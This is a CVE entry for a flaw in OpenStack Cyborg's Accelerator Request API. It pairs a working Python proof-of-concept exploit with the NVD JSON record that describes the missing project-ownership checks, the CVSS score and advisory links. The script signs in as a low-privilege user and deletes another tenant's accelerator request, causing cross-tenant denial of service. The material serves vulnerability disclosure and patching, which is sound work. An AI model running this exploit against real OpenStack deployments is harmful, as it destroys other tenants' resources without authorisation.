CVE-2026-40214

# Proof of Concept for CVE-2026-40214 # This script demonstrates how a non-admin user can delete ARQs belonging to other tenants. import requests import os # Attacker's credentials (low privilege user) AUTH_URL = "https://openstack-api:5000/v3/auth/tokens" CYBORG_URL = "https://openstack-api:666/v2/accelerator_requests" USERNAME = "attacker_user" PASSWORD = "attacker_pass" PROJECT_ID = "attacker_project_id" def get_token(): # Authenticate and get token payload = { "auth": { "identity": { "methods": ["password"], "password": { "user": { "name": USERNAME, "password": PASSWORD, "domain": {"name": "Default"} } } }, "scope": { "project": { "id": PROJECT_ID } } } } headers = {"Content-Type": "application/json"} resp = requests.post(AUTH_URL, json=payload, headers=headers, verify=False) return resp.headers.get("X-Subject-Token") def exploit(): token = get_token() headers = {"X-Auth-Token": token} # 1. List ARQs. Due to the vulnerability, this might return ARQs from all projects or allow deletion by ID. # In this PoC, we assume the attacker knows the UUID of a victim's ARQ (e.g., via enumeration or leaked ID). victim_arq_uuid = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee" print(f"Attempting to delete ARQ: {victim_arq_uuid} belonging to another tenant...") # 2. Send DELETE request delete_url = f"{CYBORG_URL}/{victim_arq_uuid}" resp = requests.delete(delete_url, headers=headers, verify=False) if resp.status_code == 204: print("[+] Success: ARQ deleted. Cross-tenant denial of service achieved.") else: print(f"[-] Failed: Status code {resp.status_code}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-40214", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:35.047", "lastModified": "2026-05-08T16:16:10.900", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-282"}]}], "references": [{"url": "https://bugs.launchpad.net/openstack-cyborg/+bug/2144056", "source": "[email protected]"}, {"url": "https://security.openstack.org/ossa/OSSA-2026-011.html", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/07/6", "source": "[email protected]"}]}}